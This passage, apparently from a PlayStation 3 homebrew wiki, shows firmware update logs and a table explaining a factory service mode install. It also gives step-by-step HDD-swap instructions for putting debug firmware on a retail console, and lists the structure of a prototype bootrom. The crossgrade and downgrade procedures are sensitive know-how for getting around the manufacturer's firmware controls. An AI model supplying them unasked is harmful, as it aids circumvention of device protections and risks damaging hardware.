/SYS_CON_FIRMWARE_01020302.pkg.spkg_hdr.1<br /> patch found: offset = 0xc65a9b0, size = 0x280<br /> required patch_name : /SYS_CON_FIRMWARE_01030302.pkg.spkg_hdr.1<br /> patch found: offset = 0xc65afb0, size = 0x280<br /> required patch_name : /SYS_CON_FIRMWARE_01040402.pkg.spkg_hdr.1<br /> patch found: offset = 0xc65b5b0, size = 0x280<br /> required patch_name : /SYS_CON_FIRMWARE_01050002.pkg.spkg_hdr.1<br /> patch found: offset = 0xc65bbb0, size = 0x280<br /> required patch_name : /SYS_CON_FIRMWARE_01050101.pkg.spkg_hdr.1<br /> patch found: offset = 0xc65c1b0, size = 0x280<br /> required patch_name : /SYS_CON_FIRMWARE_S1_00010002083E0832.pkg.spkg_hdr.1<br /> patch found: offset = 0xc65c7b0, size = 0x280<br /> required patch_name : /UPL.xml.pkg.spkg_hdr.1<br /> patch found: offset = 0xc65cdb0, size = 0x280<br /> required patch_name : /RL_FOR_PACKAGE.img.spkg_hdr.1<br /> patch for /RL_FOR_PACKAGE.img not found. skipped<br /> required patch_name : /RL_FOR_PROGRAM.img.spkg_hdr.1<br /> patch for /RL_FOR_PROGRAM.img not found. skipped<br /> required patch_name : /dev_flash3_024.tar.aa.2015_02_05_035051.spkg_hdr.1<br /> patch found: offset = 0xc65d3b0, size = 0x280<br /> required patch_name : /dev_flash_000.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc65d9b0, size = 0x280<br /> required patch_name : /dev_flash_001.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc65dfb0, size = 0x280<br /> dir_num = 1<br /> dirname = /dev_flash/data/font/<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/<br /> file_num = 20<br /> filename = /dev_flash/data/font/SCE-PS3-RD-R-LATIN2.TTF, offset = 0400, size = 0xd67c<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-RD-R-LATIN2.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-RD-R-LATIN.TTF, offset = 0de00, size = 0x95f4<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-RD-R-LATIN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-VR-R-LATIN2.TTF, offset = 017600, size = 0x218b0<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-VR-R-LATIN2.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-SR-R-LATIN2.TTF, offset = 039200, size = 0x12ee8<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-SR-R-LATIN2.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-MT-B-LATIN.TTF, offset = 04c400, size = 0x12184<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-MT-B-LATIN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-RD-L-LATIN.TTF, offset = 05e800, size = 0x9714<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-RD-L-LATIN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-YG-R-KOR.TTF, offset = 068200, size = 0x79728<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-YG-R-KOR.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-RD-I-LATIN.TTF, offset = 0e1c00, size = 0x9ea4<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-RD-I-LATIN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-RD-BI-LATIN.TTF, offset = 0ebe00, size = 0x9c80<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-RD-BI-LATIN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-RD-LI-LATIN.TTF, offset = 0f5e00, size = 0xa038<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-RD-LI-LATIN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-NR-L-JPN.TTF, offset = 0100200, size = 0x2f0eb4<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-NR-L-JPN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-CP-R-KANA.TTF, offset = 03f1400, size = 0xf27c<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-CP-R-KANA.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-MT-BI-LATIN.TTF, offset = 0400a00, size = 0x13128<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-MT-BI-LATIN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-MT-I-LATIN.TTF, offset = 0413e00, size = 0x133d8<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-MT-I-LATIN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-SR-R-EXT.TTF, offset = 0427400, size = 0x43450<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-SR-R-EXT.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-RD-L-LATIN2.TTF, offset = 046ac00, size = 0xd7fc<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-RD-L-LATIN2.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-SR-R-LATIN.TTF, offset = 0478600, size = 0xd1b0<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-SR-R-LATIN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-NR-R-JPN.TTF, offset = 0485a00, size = 0x2f5c38<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-NR-R-JPN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-YG-B-KOR.TTF, offset = 077ba00, size = 0x78ec8<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-YG-B-KOR.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-NR-R-EXT.TTF, offset = 07f4c00, size = 0x443b8<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-NR-R-EXT.TTF<br /> required patch_name : /dev_flash_002.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc65e5b0, size = 0x280<br /> dir_num = 0<br /> file_num = 3<br /> filename = /dev_flash/data/font/SCE-PS3-SR-R-JPN.TTF, offset = 0200, size = 0x47380c<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-SR-R-JPN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-NR-B-JPN.TTF, offset = 0473e00, size = 0x2d9724<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-NR-B-JPN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-MT-R-LATIN.TTF, offset = 074d800, size = 0x1202c<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-MT-R-LATIN.TTF<br /> required patch_name : /dev_flash_003.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc65ebb0, size = 0x280<br /> dirname = /dev_flash/data/font/SONY-CC/<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SONY-CC/<br /> file_num = 12<br /> filename = /dev_flash/data/font/SCE-PS3-DH-R-CGB.TTF, offset = 0200, size = 0x7d8884<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-DH-R-CGB.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-RD-B-LATIN2.TTF, offset = 07d8e00, size = 0xd328<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-RD-B-LATIN2.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-YG-L-KOR.TTF, offset = 07e6400, size = 0x78f68<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-YG-L-KOR.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-RD-B-LATIN.TTF, offset = 085f600, size = 0x9430<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-RD-B-LATIN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-VR-R-LATIN.TTF, offset = 0868e00, size = 0x10344<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-VR-R-LATIN.TTF<br /> filename = /dev_flash/data/font/SONY-CC/k006004ds.ttf, offset = 0879600, size = 0xeb94<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SONY-CC/k006004ds.ttf<br /> filename = /dev_flash/data/font/SONY-CC/e046323ts.ttf, offset = 0888400, size = 0xd960<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SONY-CC/e046323ts.ttf<br /> filename = /dev_flash/data/font/SONY-CC/c041056ts.ttf, offset = 0896000, size = 0x116dc<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SONY-CC/c041056ts.ttf<br /> filename = /dev_flash/data/font/SONY-CC/n023055ms.ttf, offset = 08a7a00, size = 0xb38c<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SONY-CC/n023055ms.ttf<br /> filename = /dev_flash/data/font/SONY-CC/e046323ms.ttf, offset = 08b3000, size = 0xc25c<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SONY-CC/e046323ms.ttf<br /> filename = /dev_flash/data/font/SONY-CC/n023055ts.ttf, offset = 08bf600, size = 0xc9c0<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SONY-CC/n023055ts.ttf<br /> filename = /dev_flash/data/font/SONY-CC/d013013ds.ttf, offset = 08cc200, size = 0x11174<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SONY-CC/d013013ds.ttf<br /> required patch_name : /dev_flash_004.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc65f1b0, size = 0x280<br /> dir_num = 2<br /> dirname = /dev_flash/vsh/etc/<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/<br /> dirname = /dev_flash/vsh/etc/print/<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/print/<br /> file_num = 11<br /> filename = /dev_flash/vsh/etc/layout_factor_table_720.txt, offset = 0400, size = 0x1ff<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/layout_factor_table_720.txt<br /> filename = /dev_flash/vsh/etc/layout_grid_table_720.txt, offset = 0800, size = 0x3fd5<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/layout_grid_table_720.txt<br /> filename = /dev_flash/vsh/etc/layout_grid_table_1080.txt, offset = 04a00, size = 0x41f6<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/layout_grid_table_1080.txt<br /> filename = /dev_flash/vsh/etc/index.dat, offset = 08e00, size = 0x4f0<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/index.dat<br /> filename = /dev_flash/vsh/etc/layout_factor_table_272.txt, offset = 09600, size = 0x1dd<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/layout_factor_table_272.txt<br /> filename = /dev_flash/vsh/etc/version.txt, offset = 09a00, size = 0x4ce<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/version.txt<br /> filename = /dev_flash/vsh/etc/layout_grid_table_480.txt, offset = 0a200, size = 0x3dc9<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/layout_grid_table_480.txt<br /> filename = /dev_flash/vsh/etc/print/epson.pmd, offset = 0e400, size = 0x7154<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/print/epson.pmd<br /> filename = /dev_flash/vsh/etc/layout_grid_table_272.txt, offset = 015800, size = 0x3df7<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/layout_grid_table_272.txt<br /> filename = /dev_flash/vsh/etc/layout_factor_table_480.txt, offset = 019800, size = 0x1dc<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/layout_factor_table_480.txt<br /> filename = /dev_flash/vsh/etc/layout_factor_table_1080.txt, offset = 019c00, size = 0x1f2<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/layout_factor_table_1080.txt<br /> required patch_name : /dev_flash_005.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc65f7b0, size = 0x280<br /> required patch_name : /dev_flash_006.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc65fdb0, size = 0x280<br /> required patch_name : /dev_flash_007.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6603b0, size = 0x280<br /> required patch_name : /dev_flash_008.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6609b0, size = 0x280<br /> required patch_name : /dev_flash_009.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc660fb0, size = 0x280<br /> required patch_name : /dev_flash_010.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6615b0, size = 0x280<br /> required patch_name : /dev_flash_011.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc661bb0, size = 0x280<br /> required patch_name : /dev_flash_012.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6621b0, size = 0x280<br /> required patch_name : /dev_flash_013.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6627b0, size = 0x280<br /> required patch_name : /dev_flash_014.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc662db0, size = 0x280<br /> required patch_name : /dev_flash_015.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6633b0, size = 0x280<br /> required patch_name : /dev_flash_016.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6639b0, size = 0x280<br /> required patch_name : /dev_flash_017.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc663fb0, size = 0x280<br /> required patch_name : /dev_flash_018.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6645b0, size = 0x280<br /> required patch_name : /dev_flash_019.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc664bb0, size = 0x280<br /> required patch_name : /dev_flash_020.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6651b0, size = 0x280<br /> required patch_name : /dev_flash_021.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6657b0, size = 0x280<br /> required patch_name : /dev_flash_022.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc665db0, size = 0x280<br /> required patch_name : /dev_flash_023.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6663b0, size = 0x280<br /> setup environment for ps3updater done.<br /> umount game cache<br /> umount game cache success<br /> Unmount:: not call unset_storage_event_handler<br /> UfsSysUinit2:not call ffs_uninitUnmount:: not call free<br /> <br /> Prepare to shutdown .....Going to shutdown.<br /> Stage 2 says hello (load base = 0x8000000000540000, end = 0x8000000000558330) (version = 0104700F)<br /> OK<br /> <br /> ###<br /> ### Software update mode<br /> <br /> mounting the builtin HDD1 : cellFsUtilMount: /dev_hdd1<br /> PROCESS /dev_hdd1/PS3UPDATE/ps3swu.self (01000200) loaded<br /> PROCESS /dev_hdd1/PS3UPDATE/ps3swu.self (01000200_main_ps3swu.self) (01000200) created from parent process:<br /> creating the initial system process : OK<br /> cellFsUtilMount: /dev_flash2<br /> cellFsUtilMount: /dev_flash3<br /> Registry: running in recovery mode<br /> Registry initialization start:............ done<br /> We are originally in region 82<br /> &lt;/pre&gt;<br /> other: http://pastie.org/pastes/10056453/text?key=utexzvyefmddeddktp3og<br /> <br /> == Factory Service Mode - Installation log breakdown ==<br /> Explaination from rms: http://rmscrypt.wordpress.com/2011/02/01/the-downgrade-process/<br /> <br /> Sample logs:<br /> * http://pastebin.com/XhcjfAjw (downgrade 3.66 -&gt; 3.15)<br /> * http://pastebin.com/SAN7Z3Dq (UPL 3.15)<br /> <br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! log !! Explaination !! Notes<br /> |-<br /> | || manufacturing bit detection in Syscon eeprom, manufacturing mode enabled, looking for lv2_diag.self || <br /> |-<br /> | &lt;pre&gt; manufacturing updating start&lt;/pre&gt; || lv2_diag.self initialised || <br /> |-<br /> | &lt;pre&gt;PackageName = /dev_usb000/PS3UPDAT.PUP&lt;/pre&gt; || PUP file used for FSM reinstall on USB root || <br /> |-<br /> | &lt;pre&gt; settle polling interval success&lt;/pre&gt; || || <br /> |-<br /> | &lt;pre&gt; vflash is disabled...<br /> boot from nand flash...&lt;/pre&gt; || NAND system detected, vflash disabled || <br /> |-<br /> | &lt;pre&gt; creating flash regions...<br /> create storage region: (region id = 2)<br /> format partition: (region_id = 2, CELL_FS_IOS:BUILTIN_FLSH1, CELL_FS_FAT)<br /> create storage region: (region id = 3)<br /> format partition: (region_id = 3, CELL_FS_IOS:BUILTIN_FLSH2, CELL_FS_FAT)<br /> create storage region: (region id = 4)<br /> format partition: (region_id = 4, CELL_FS_IOS:BUILTIN_FLSH3, CELL_FS_FAT)<br /> create storage region: (region id = 5)<br /> create storage region: (region id = 6)&lt;/pre&gt; || creating FLASH regions 2, 3, 4, 5, 6 and formatting regions 2, 3, 4 || <br /> |-<br /> | &lt;pre&gt; Initializing<br /> taking a while...<br /> start Updating Proccess<br /> Initialize elapsed time = 61 msec&lt;/pre&gt; || Initializing + Start Updating Proccess || <br /> |-<br /> | &lt;pre&gt; check UPL<br /> Check UPL elapsed time = 34 msec<br /> check Package Size<br /> get package size elapsed time = 8 msec<br /> start Updating Package<br /> Update packages num = 29<br /> Update packages total size = 160699026&lt;/pre&gt; || UPL.xml.pkg from PUP unpkg'ed and read || <br /> |-<br /> | &lt;pre&gt; Update Package Revoke list<br /> read package revoke list package (576 bytes) elapsed = 6 msec<br /> update package revoke list elapsed = 331 msec<br /> Update Package Revoke list done(0x8002f000)&lt;/pre&gt; || RL_FOR_PACKAGE.img copied from PUP to [[Flash#trvk_pkg|trvk_pkg]] || <br /> |-<br /> | &lt;pre&gt; Update Core OS Package<br /> read core os package (5193774 bytes) elapsed = 324 msec<br /> update core os package elapsed = 1965 msec<br /> Update Core OS Package done(0x8002f000)&lt;/pre&gt; || [[CoreOS|Core OS]] package (CORE_OS_PACKAGE.pkg) is unpkg'ed from PUP and written to [[Flash#ros|ros]] || <br /> |-<br /> | &lt;pre&gt; Update VSH Package<br /> sys_memory_container_create() success(id = 0xc0effffe)<br /> Update VSH's package : 1/21<br /> read vsh package (2070 bytes) elapsed = 8 msec<br /> decrypt and verify vsh package elapsed = 23 msec<br /> write vsh package elapsed = 9259 msec<br /> compare vsh package elapsed = 0 msec<br /> Update VSH's package : 2/21<br /> read vsh package (5616383 bytes) elapsed = 351 msec<br /> decrypt and verify vsh package elapsed = 341 msec<br /> write vsh package elapsed = 1725 msec<br /> compare vsh package elapsed = 402 msec<br /> Update VSH's package : 3/21<br /> read vsh package (3357780 bytes) elapsed = 214 msec<br /> decrypt and verify vsh package elapsed = 227 msec<br /> write vsh package elapsed = 2926 msec<br /> compare vsh package elapsed = 312 msec<br /> Update VSH's package : 4/21<br /> read vsh package (5240122 bytes) elapsed = 328 msec<br /> decrypt and verify vsh package elapsed = 309 msec<br /> write vsh package elapsed = 2776 msec<br /> compare vsh package elapsed = 399 msec<br /> Update VSH's package : 5/21<br /> read vsh package (24029 bytes) elapsed = 9 msec<br /> decrypt and verify vsh package elapsed = 24 msec<br /> write vsh package elapsed = 1185 msec<br /> compare vsh package elapsed = 9 msec<br /> Update VSH's package : 6/21<br /> read vsh package (9831317 bytes) elapsed = 599 msec<br /> decrypt and verify vsh package elapsed = 279 msec<br /> write vsh package elapsed = 11830 msec<br /> compare vsh package elapsed = 466 msec<br /> Update VSH's package : 7/21<br /> read vsh package (8662380 bytes) elapsed = 539 msec<br /> decrypt and verify vsh package elapsed = 272 msec<br /> write vsh package elapsed = 16532 msec<br /> compare vsh package elapsed = 474 msec<br /> Update VSH's package : 8/21<br /> read vsh package (8657372 bytes) elapsed = 541 msec<br /> decrypt and verify vsh package elapsed = 361 msec<br /> write vsh package elapsed = 5911 msec<br /> compare vsh package elapsed = 448 msec<br /> Update VSH's package : 9/21<br /> read vsh package (10445426 bytes) elapsed = 635 msec<br /> decrypt and verify vsh package elapsed = 255 msec<br /> write vsh package elapsed = 5408 msec<br /> compare vsh package elapsed = 467 msec<br /> Update VSH's package : 10/21<br /> read vsh package (10252830 bytes) elapsed = 641 msec<br /> decrypt and verify vsh package elapsed = 262 msec<br /> write vsh package elapsed = 8646 msec<br /> compare vsh package elapsed = 476 msec<br /> Update VSH's package : 11/21<br /> read vsh package (9922968 bytes) elapsed = 621 msec<br /> decrypt and verify vsh package elapsed = 252 msec<br /> write vsh package elapsed = 6950 msec<br /> compare vsh package elapsed = 467 msec<br /> Update VSH's package : 12/21<br /> read vsh package (8214459 bytes) elapsed = 505 msec<br /> decrypt and verify vsh package elapsed = 199 msec<br /> write vsh package elapsed = 5843 msec<br /> compare vsh package elapsed = 386 msec<br /> Update VSH's package : 13/21<br /> read vsh package (9428094 bytes) elapsed = 594 msec<br /> decrypt and verify vsh package elapsed = 244 msec<br /> write vsh package elapsed = 5238 msec<br /> compare vsh package elapsed = 442 msec<br /> Update VSH's package : 14/21<br /> read vsh package (7973335 bytes) elapsed = 498 msec<br /> decrypt and verify vsh package elapsed = 346 msec<br /> write vsh package elapsed = 13617 msec<br /> compare vsh package elapsed = 456 msec<br /> Update VSH's package : 15/21<br /> read vsh package (9766737 bytes) elapsed = 603 msec<br /> decrypt and verify vsh package elapsed = 360 msec<br /> write vsh package elapsed = 17267 msec<br /> compare vsh package elapsed = 529 msec<br /> Update VSH's package : 16/21<br /> read vsh package (9199234 bytes) elapsed = 583 msec<br /> decrypt and verify vsh package elapsed = 407 msec<br /> write vsh package elapsed = 23189 msec<br /> compare vsh package elapsed = 689 msec<br /> Update VSH's package : 17/21<br /> read vsh package (7260896 bytes) elapsed = 466 msec<br /> decrypt and verify vsh package elapsed = 286 msec<br /> write vsh package elapsed = 14751 msec<br /> compare vsh package elapsed = 689 msec<br /> Update VSH's package : 18/21<br /> read vsh package (6563380 bytes) elapsed = 422 msec<br /> decrypt and verify vsh package elapsed = 155 msec<br /> write vsh package elapsed = 1906 msec<br /> compare vsh package elapsed = 357 msec<br /> Update VSH's package : 19/21<br /> read vsh package (6092245 bytes) elapsed = 373 msec<br /> decrypt and verify vsh package elapsed = 227 msec<br /> write vsh package elapsed = 1457 msec<br /> compare vsh package elapsed = 405 msec<br /> Update VSH's package : 20/21<br /> read vsh package (9859067 bytes) elapsed = 590 msec<br /> decrypt and verify vsh package elapsed = 238 msec<br /> write vsh package elapsed = 2187 msec<br /> compare vsh package elapsed = 498 msec<br /> Update VSH's package : 21/21<br /> read vsh package (6492084 bytes) elapsed = 419 msec<br /> decrypt and verify vsh package elapsed = 321 msec<br /> write vsh package elapsed = 17509 msec<br /> compare vsh package elapsed = 674 msec<br /> Update VSH Package done(0x8002f000)&lt;/pre&gt; || dev_flash_000.tar.aa.* files from PUP are unpkg'ed to dev_flash || <br /> |-<br /> | &lt;pre&gt; Bul-ray Disc Player Revoke<br /> read bdp revoke package (1904 bytes) elapsed = 23 msec<br /> decrypt and verify bdp revoke package elapsed = 29 msec<br /> write bdp revoke package elapsed = 2240 msec<br /> compare bdprevoke package elapsed = 57 msec<br /> Bul-ray Disc Player Revoke done(0x8002f000)&lt;/pre&gt; || dev_flash3_024.tar.aa.* files from PUP are unpkg'ed to dev_flash3 || <br /> |-<br /> | &lt;pre&gt; Update Program Revoke list<br /> read program revoke list package (704 bytes) elapsed = 7 msec<br /> update program revoke list elapsed = 331 msec<br /> Update Program Revoke list done(0x8002f000)&lt;/pre&gt; || RL_FOR_PROGRAM.img from PUP is copied to [[Flash#trvk_prg|trvk_prg]] || <br /> |-<br /> | &lt;pre&gt; move_2block_status_into_the_region(): region id = 3<br /> rewrite_region() region id = 0x3, start_lba = 0x0, end_lba = 0x4000<br /> rewrite region done (ret = 0x8002f000)<br /> rewrite region elapsed time = 1262 msec<br /> touch_1st_sector_in_block() region id = 0x3, start_lba = 0x0, end_lba = 0x4000<br /> touch_1st_sector() done (ret = 0x8002f000)<br /> touch_1st_sector() elapsed time = 1121 msec<br /> rewrite_region() region id = 0x3, start_lba = 0x0, end_lba = 0x4000<br /> rewrite region done (ret = 0x8002f000)<br /> rewrite region elapsed time = 1262 msec&lt;/pre&gt; || || <br /> |-<br /> | &lt;pre&gt; Update BD firmware<br /> read BD firmware package (1966992 bytes) elapsed = 142 msec<br /> update BD firmware elapsed = 184 msec<br /> read BD firmware package (951040 bytes) elapsed = 78 msec<br /> update BD firmware elapsed = 142 msec<br /> read BD firmware package (951040 bytes) elapsed = 80 msec<br /> update BD firmware elapsed = 13959 msec<br /> Update BD firmware done(0x8002f000)&lt;/pre&gt; || Appropiate [[Bluray_Drive_Firmware|BD firmware]] for that [[Bluray Drive]] is flashed to BD eeprom || <br /> |-<br /> | &lt;pre&gt; Update Multi-Card controller firmware<br /> read MCC package (28636 bytes) elapsed = 25 msec<br /> update MCC elapsed = 24 msec<br /> Update Multi-Card controller firmware done(0x8002f000)&lt;/pre&gt; || If SKU with [[MultiCardReader]] then [[MultiCardReader_Firmware|Multi-Card controller firmware]] is flashed to [[MultiCardReader#SST_39VF010_70-4C-WHE_.28Flash.2C_1Mbit.2C_128K_x8.2C_2.7-3.6V.2C_70ns_TSOP32.29|SST 1mbit Flash]] || <br /> |-<br /> | &lt;pre&gt; Update BlueTooth firmware<br /> read BT package (639368 bytes) elapsed = 62 msec<br /> update BT elapsed = 56 msec<br /> Update BlueTooth firmware done(0x8002f000)&lt;/pre&gt; || [[Bluetooth#Spansion_S99AL008D002_0630DBA_H_.28NOR_Flash_8Mbit_3.3V.29|Bluetooth NOR flash]] is updated with <br /> [[Bluetooth_Firmware|BlueTooth firmware]]<br /> |-<br /> | &lt;pre&gt; Update System controller firmware<br /> read SC patch package (4864 bytes) elapsed = 24 msec<br /> read SC patch package (4864 bytes) elapsed = 24 msec<br /> read SC patch package (4864 bytes) elapsed = 23 msec<br /> Update System controller firmware done(0x8002f000)&lt;/pre&gt; || [[Syscon Hardware]] is updated with appropiate [[System_Controller_Firmware|System controller firmware]] || <br /> |-<br /> | &lt;pre&gt; update package elapsed time = 228361 msec&lt;/pre&gt; || || <br /> |-<br /> | &lt;pre&gt; post processiong...<br /> post processiong done<br /> cleanup update status (ret = 0)&lt;/pre&gt; || || <br /> |-<br /> | &lt;pre&gt; os version = 03.1500<br /> build_version = 38031,20091206&lt;/pre&gt; || || <br /> |-<br /> | &lt;pre&gt; region of core os package = 0x40000000&lt;/pre&gt; || || <br /> |-<br /> | &lt;pre&gt; build_target = CEX-ww<br /> build target id = 0x83&lt;/pre&gt; || || <br /> |-<br /> | &lt;pre&gt; manufacturing updating SUCCESS(0x8002f000)&lt;/pre&gt; || || <br /> |-<br /> | &lt;pre&gt; set product mode (ret = 0)&lt;/pre&gt; || || <br /> |-<br /> | &lt;pre&gt; Total Elapsed time = 230556 msec&lt;/pre&gt; || || <br /> |-<br /> |}<br /> <br /> == old crossgrading Retail/CEX to Debug/DEX ==<br /> '''Note'''&lt;br /&gt;<br /> For this to work your system must be below or at 1.80 for the 1.80 debug update and below or on 2.01 for the 2.15 debug update. Just use the next version up from your current firmware version for the retail update.<br /> <br /> It's not very usefull, esp. nowadays, added for historic reasons<br /> <br /> ===How to install debug firmware on retail PS3===<br /> old source: &lt;span style=&quot;text-decoration: line-through;&quot;&gt;http://www.ps3hax.net/other-misc-tutorials/4808-tutorial-how-install-debug-firmware-retail-ps3-partially-hdd-swap-method.html&lt;/span&gt;<br /> <br /> ====Tools needed====<br /> * 1 PS3 system<br /> * 2 PS3 hard drives that are the same size<br /> * 1 retail firmware upgrade<br /> * 1.80 Or 2.15 debug firmware<br /> <br /> ====Instructions====<br /> <br /> # Format both hard drives on the PS3 system.<br /> # Download a debug PS3 firmware and place it in USB stick, and start the update. This will copy all the debug firmware files to the PS3's HDD-A.<br /> # After copied the PS3 will restart and you will see the normal update menu which prompts you to click the button to start update. Do NOT update your PS3, but power it off.<br /> # Next remove the HDD-A, and place in the second HDD, HDD-B in the PS3.<br /> # Download and copy a retail PS3 firmware to a USB stick.<br /> # Again as before place USB in PS3 and update the PS3 as normal but when you get to the screen where it asks for you to press button, do that but stop when it asks you to AGREE to Terms and Condition Page.<br /> # While the system is still powered on and on the update screen, REMOVE HDD-B, and insert HDD-A.<br /> # After swapping the HDD's continuie to update the PS3 as normal and the PS3 will install the debug PS3 firmware=<br /> # Go to the settings and check firmware version and there you will also see the debugging PS3 options :)<br /> <br /> <br /> <br /> ----<br /> <br /> <br /> == Ancient preproduction / prototype ==<br /> ceb decrypter (works on 0.50.004.r010, may work on others)<br /> <br /> http://pastie.org/private/al9p0vkw3g0lgat2yeazw#4,11<br /> <br /> CEB-201x, DEH-R1030 etc.<br /> <br /> old SDKs contain these binairy files in \cell\target\bootrom, <br /> while knowledge about previous version existance can be revealed by the documentation in \cell\info\old\XXX<br /> <br /> === ebootrom structure ===<br /> ====Header====<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Offset !! Length !! Type !! Information<br /> |-<br /> | 0x0 || 0x4 || unsigned long || Unknown<br /> |-<br /> | 0x4 || 0x4 || unsigned long || File Count<br /> |-<br /> | 0x8 || 0x8 || unsigned long || File Length<br /> |-<br /> | 0x10 || 0x30 * '''File Count''' || '''File Table''' || File Table<br /> |-<br /> |}<br /> ====File Table====<br /> The file table consists of a number of file entries determined by '''File Count''', with the format below:<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Offset !! Length !! Type !! Information<br /> |-<br /> | 0x0 || 0x8 || unsigned long || Data 